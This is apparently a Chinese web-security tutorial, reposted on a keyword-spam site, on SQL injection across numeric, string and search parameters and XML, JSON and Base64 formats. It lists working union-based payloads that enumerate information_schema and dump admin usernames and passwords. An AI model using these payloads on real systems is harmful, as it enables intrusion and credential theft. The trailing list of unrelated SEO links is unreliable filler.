当前位置: 首页 > wzjs >正文

郑州营销型网站建设价格深圳网络营销

郑州营销型网站建设价格,深圳网络营销,怎么查二建注册在哪个公司,网站建设定制开发价格知识点: 1、Web攻防-SQL注入-参数类型&参数格式 2、Web攻防-SQL注入-XML&JSON&BASE64等 3、Web攻防-SQL注入-数字字符搜索等符号绕过 案例说明: 在应用中,存在参数值为数字,字符时,符号的介入&#xff0c…

知识点:
1、Web攻防-SQL注入-参数类型&参数格式
2、Web攻防-SQL注入-XML&JSON&BASE64等
3、Web攻防-SQL注入-数字字符搜索等符号绕过

案例说明:
在应用中,存在参数值为数字,字符时,符号的介入,另外搜索功能通配符的再次介入,另外传输数据可由最基本的对应赋值传递改为更加智能的XMLJSON格式传递,部分保证更安全的情况还会采用编码或加密形式传递数据,给于安全测试过程中更大的挑战和难度。

一、演示案例-WEB攻防-SQL注入-参数类型&符号干扰

需要考虑闭合问题
在这里插入图片描述

数字

select * from news where id=$id; 

在这里插入图片描述
在这里插入图片描述

字符

select * from news where name='$name'; 

在这里插入图片描述
在这里插入图片描述

搜索

select * from news where name like '%name%';
符号干扰:有无单引号或双引号及通配符等

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

%' order by 3#

在这里插入图片描述

%' union select 1,2,3#

在这里插入图片描述
在这里插入图片描述
知道数据库名:news_db

获取数据库名下的表名信息:
借助自带的information_schema.tables表(记录所有数据库名下的表名)

1%' union select 1,2,table_name from information_schema.tables where table_schema='news_db'#

在这里插入图片描述
admin表名下的列名
借助自带的information_schema.columns表(记录所有数据库名下的表名对应的列名信息)

1%' union select 1,2,column_name from information_schema.columns where table_schema='news_db' and table_name='admin'#

在这里插入图片描述
查询列名相关数据

1%' union select 1,username,password from admin#

在这里插入图片描述

二、演示案例-WEB攻防-SQL注入-参数格式&参数编码

1、数据传输采用XML或JSON格式传递
2、数据传输采用编码或加密形式传递
3、数据传递采用JSON又采用编码传递

XML

<?xml version="1.0" encoding="UTF-8"?>
<news><article><id>1</id><title>xiaodi</title><content>i am xiaodi</content><created_at>2025-03-07</created_at></article><article><id>2</id><title>xiaodisec</title><content>i am xiaodisec</content><created_at>2025-03-06</created_at></article>
</news>

在这里插入图片描述
在这里插入图片描述

JSON

{"news:"[
{"id": 1,"title": "xiaodi","content": "i am xiaodi","created_at": "2025-03-07"
},
{"id": 2,"title": "xiaodisec","content": "i am xiaodisec","created_at": "2025-03-06"
}]
}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Base64

{"news": [
{"id": "MQ==","title": "eGlhb2Rp","content": "aSBhbSB4aWFvZGk=","created_at": "MjAyNS0wMy0wNw=="
},
{"id": "Mg==","title": "eGlhb2Rpc2Vj","content": "aSBhbSB4aWFvZGlzZWM=","created_at": "MjAyNS0wMy0wNg=="
}]
}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

实例应用-编码注入案例

https://mp.weixin.qq.com/s/Xf08xaV-YcZsQopE19pPEQ

http://www.dtcms.com/wzjs/185720.html

相关文章:

  • 做的网站百度搜不到手机百度下载
  • 电商网站的制作搜索关键词查询工具
  • 安卓做视频网站好aso优化方案
  • 个人能做网站吗成都seo
  • 网站开发 哪家好专门开发小程序的公司
  • 虞城做网站百度网站ip地址
  • 摄影网站投稿班级优化大师下载安装app
  • 厦门建网站品牌写软文能赚钱吗
  • 问卷调查微信小程序怎么做平台优化
  • 网站做管理后台需要知道什么十大搜索引擎
  • 中原郑州网站建设软文是什么东西
  • 学校响应式网站建设排名首页服务热线
  • 高端网站开发企业建网站一般要多少钱
  • 建工厂网站的公司网站推广软件免费
  • 青岛网站建设订做网站出租三级域名费用
  • 衢州市院士专家工作站建设网站网上竞价
  • 小说网站怎么用html做广东公司搜索seo哪家强
  • 网站运营发展前景品牌运营方案
  • 怎么做黑彩票网站百度推广要多少钱
  • 做网站前台模板长春网络科技公司排名
  • 深圳企业黄页网站网站ip查询
  • 全国最缺工的100个职业排行百度seo刷排名软件
  • 运维管理平台甘肃seo技术
  • 贵阳微网站建设公司建站平台如何隐藏技术支持
  • 感染新冠病毒后需要注意什么seo独立站优化
  • 什么是网站定位百度统计app下载
  • 做微信用什么网站网推app
  • 利用百度快照搜索消失的网站做网络优化哪家公司比较好
  • 深圳网站建设公司简介宁波网站推广代运营
  • 惠州网站制作策划宁波网络营销公司有哪些